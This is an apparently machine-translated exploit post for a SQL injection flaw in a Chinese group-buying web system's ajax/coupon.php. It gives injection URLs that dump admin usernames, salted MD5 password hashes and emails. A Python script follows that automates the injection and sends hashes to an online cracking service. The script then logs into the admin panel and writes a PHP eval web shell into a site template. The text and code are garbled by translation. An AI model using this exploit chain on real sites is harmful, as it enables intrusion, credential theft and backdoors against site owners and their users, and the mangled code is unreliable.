China Cold Dragon Production-most soil purchase system general SQL injection Vulnerability WWW.HACKERSCHINA.ORG

Basic function filtering does not completely result in injections.

ajax/coupon.php

Exp:

1	AJAX/COUPON.PHP?ACTION=CONSUME&SECRET=8&ID=2%27)/**/and/**/1=2/**/union/**/select/**/1,2,0,4,5,6, Concat (0x31,0x3a,username,0x3a,password,0x3a,email,0x3a), 8,9,10,11,9999999999,13,14,15,16/**/from/**/user/**/ Where/**/manager=0x59/**/limit/**/0,1%23

If not, replace it with 15 digits.

1	AJAX/COUPON.PHP?ACTION=CONSUME&SECRET=8&ID=2%27)/**/and/**/1=2/**/union/**/select/**/1,2,0,4,5,6, Concat (0x31,0x3a,username,0x3a,password,0x3a,email,0x3a), 8,9,10,11,9999999999,13,14,15/**/from/**/user/**/ Where/**/manager=0x59/**/limit/**/0,1%23

Encryption mode MD5 (password. " @[email protected]#$%@ ")

Add salt (@[email protected]#$%@) behind the MD5

Although the development has stopped, but Google is still a lot of people use.

Attach a SQL injection to Getshell Exp:

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465 66676869707172737475767778798081828384858687888990

#!/usr/bin/env python#coding=utf-8  import sys;import re;import requests;import cookielib;import urllib; Import Urllib2;  def Main ():     url=sys.argv[1];    if Len ( SYS.ARGV) ==2:        exploit (URL);         pass;  def Exploit (URL):     print "Use of ...";     headers = {' user-agent ': ' mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) gecko/20100101 firefox/23.0 '};    exp= ("/ajax/coupon.php?action=consume&secret =8&id=2%27)/**/and/**/1=2/**/union/**/select/**/1,2,0,4,5,6,concat (0x31,0x3a,username,0x3a,password,0x3a, EMAIL,0X3A), 8,9,10,11,9999999999,13,14,15,16/**/from/**/user/**/where/**/manager=0x59/**/limit/**/0,1%23 ","/ AJAX/COUPON.PHP?ACTION=CONSUME&AMP;SECRET=8&AMP;ID=2%27)/**/and/**/1=2/**/union/**/select/**/1,2,0,4,5,6, Concat (0x31,0x3a,username,0x3a,password,0x3a,email,0x3a), 8,9,10,11,9999999999,13,14,15/**/from/**/user/**/where/**/manager=0x59/**/limit/**/0,1%23 ");     for I in range (2):         htmlcontent=requests.get (Url+exp[i] , headers=headers). Text.encode ("Utf-8");         matching=re.compile (R "\:(\w+\:\w+) \: ');         result=matching.findall (htmlcontent);         if result:             print u "use Complete" +result[0]+ ": @[email protected]#$%@";             md5crack (Result[0],url);         pass;def Md5crack (Result,posturl):     resul=result.split (': ') [1]+]: @[email  protected]#$%@ "    url=" http://www.cmd5.com/default.aspx ";     headers = {' Referer '': ' http://www.cmd5.com/default.aspx ', ' content-type ': ' application/x-www-form-urlencoded ', ' Accept-language ': ' zh-cn,zh;q=0.8 ', ' user-agent ': ' mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) gecko/20100101 firefox/23.0 ', ' Accept ': ' text/html,application/xhtml+xml,application/xml;q=0.9,image/ webp,*/*;q=0.8 ', ' Cookie ': ' asp.net_sessionid=duo0vysxepmc0mwdtvtlz033; cnzzdata3819543=cnzz_eid%3d1447456137-1406904769-%26ntime%3d1412593037 '};    data = Urllib.urlencode ({"__eventtarget": "Button1", "ctl00$contentplaceholder1$textboxinput": Resul, "ctl00$ Contentplaceholder1$inputhashtype ":" MD5 "," Ctl00$contentplaceholder1$button1 ":" Decryption "," ctl00$contentplaceholder1$ HiddenField1 ":" "," Ctl00$contentplaceholder1$hiddenfield2 ":" awumplta7raz0/ Sgwirtowc1erlhtceb7j0rhx44kq6gsja0jxkfj0gwmsuyev0h "});     req = Urllib2. Request (url,data,headers);     htmlcontent= Urllib2.urlopen (req). Read ();     if Re.findall (R ' Buy ', htmlcontent): &NBsp;       print u "can buy";         Choice=raw_input ("Getshell y/n:". Decode ("Utf-8"). Encode ("GBK"). Upper ();         if choice== ' Y ':             Login (Posturl,result);            pass;         elif choice== ' N ':             print u "Thank you for your use";    else:         print u "cannot buy please modify the statement query next user try";         choice=raw_input ("Whether Getshell Y /n: ". Decode (' Utf-8 '). Encode (" GBK "). Upper ();         if choice== ' Y ' ':             login (Posturl,result);      &nbSp;      pass;        elif Choice== ' N ':             print u "Thank you for using";d EF login (url,result):     user=result.split (': ') [0];    passwd=raw_input ("Please enter the password you cracked:". Decode (' Utf-8 '). Encode ("GBK");     geturl=url+ "/manage/login.php";     getur=url+ "/manage/index.php";     content=urllib2.urlopen (URL);     res=content.getcode ();     if res==200:         posturl=url+ "/manage/system/template.php?id=about_job.html";         headers = {' Referer ': Getur, ' content-type ': ' application/x-www-form-urlencoded ', ' accept-language ': ' zh-cn,zh;q=0.8 ', ' user-agent ': ' mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) gecko/20100101 firefox/23.0 ', ' Accept ': ' text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 ', ' Cookie ': ' Bdshare_firstime= 1408212168656; cnzzdata5760804=cnzz_eid%3d1828295659-1408725529-%26ntime%3d1408776317; iweb_shoppingcart=15f6e9c7a6mdewodaxmdexmdfkythlmdfmntvlzmo4mjkzydiym2f7jmdqb2dxjz9bwcqmexnvzhxidcyzw115; IWEB_SAFECODE=96AEED3E1CNDG4MDGXMDG1M2YXMDK9NMO2NGC7ZDFHYJLMMJS6PDA; CKFINDER_PATH=FILES%3A%2F%3A1; Jishigou_ra1gan_auth=97e5%2fuhqnoh1l3nsomkg2byzplbiuacpoxnvrvil2neon1esmpkjvqvekceu7e8yb0axeg0w5fvktbuco%2fel; JISHIGOU_RA1GAN_SID=2IX1XP; Ajstat_ok_times=1; cnzzdata1670348=cnzz_eid%3d166368451-1411712331-time%3d1412029938; Finder_showname=on; Finder_showsize=off; Finder_showtime=off; Finder_order=name; Finder_orderdesc=off; Finder_view=thumbs; Finder_displaysettings=off; ecs[visit_times]=16; Phpsessid=p6fld8b6dvthgcs86iu60ikhn5 '};        data =urllib.urlencode ( {"username": User, "password":p asswd, "commit": "Login"});         cj = Cookielib. Lwpcookiejar ();         cookie_support = Urllib2. Httpcookieprocessor (CJ)         opener = Urllib2.build_opener (cookie_ Support, Urllib2. HttpHandler);         urllib2.install_opener (opener);         req = Urllib2. Request (geturl,data,headers);         urllib2.urlopen (req). read ();         getshell (Url,posturl);    else:         print u "background address modified please find the real back office address and then operate";d EF Getshell (url,posturl):     url=url+ "/about/job.php";     headers = {' Referer ':p osturl, ' content-type ': ' Application/x-www-form-urlencoded ', ' accept-language ': ' zh-cn,zh;q=0.8 ', ' user-agent ': ' mozilla/5.0 ( Windows NT 6.1; WOW64; rv:23.0) gecko/20100101 firefox/23.0 ', ' Accept ': ' Text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 ', ' Cookie ': ' Bdshare_firstime= 1408212168656; cnzzdata5760804=cnzz_eid%3d1828295659-1408725529-%26ntime%3d1408776317; iweb_shoppingcart=15f6e9c7a6mdewodaxmdexmdfkythlmdfmntvlzmo4mjkzydiym2f7jmdqb2dxjz9bwcqmexnvzhxidcyzw115; IWEB_SAFECODE=96AEED3E1CNDG4MDGXMDG1M2YXMDK9NMO2NGC7ZDFHYJLMMJS6PDA; CKFINDER_PATH=FILES%3A%2F%3A1; Jishigou_ra1gan_auth=97e5%2fuhqnoh1l3nsomkg2byzplbiuacpoxnvrvil2neon1esmpkjvqvekceu7e8yb0axeg0w5fvktbuco%2fel; JISHIGOU_RA1GAN_SID=2IX1XP; Ajstat_ok_times=1; cnzzdata1670348=cnzz_eid%3d166368451-1411712331-http%253a%252f%252flocalhost%252f%26ntime%3d1412029938; Finder_showname=on; Finder_showsize=off; Finder_showtime=off; Finder_order=name; Finder_orderdesc=off; Finder_view=thumbs; Finder_displaysettings=off; ecs[visit_times]=16; Phpsessid=p6fld8b6dvthgcs86iu60ikhn5 '};    data =urllib.urlencode ({"template_id": "About_ Job.html "," Content ":" <?php eval ($_post["Love"); Echo ' FuckWeb "?>", "Commit": "Save"});     #cj = Cookielib. Lwpcookiejar ();     #cookie_support = Urllib2. Httpcookieprocessor (CJ);     #opener = Urllib2.build_opener (Cookie_support, Urllib2. HttpHandler);     #urllib2. Install_opener (opener);     req=urllib2. Request (posturl,data,headers);     urllib2.urlopen (req). read ();     html =requests.get (URL). Text;    if re.findall (R ' Fuck Web ', html):         print U "Congratulations Getshell success \ n";         print u "Shell address:" +URL;         print u "Password: Love";    else:         print u "Getshell failure, please do not be discouraged, try again by hand, there may be a dog"; if __name__ = = ' __main__ ':     main ();

China cold Dragon Production-most Earth Purchase System General SQL injection Vulnerability WWW.HACKERSCHINA.ORG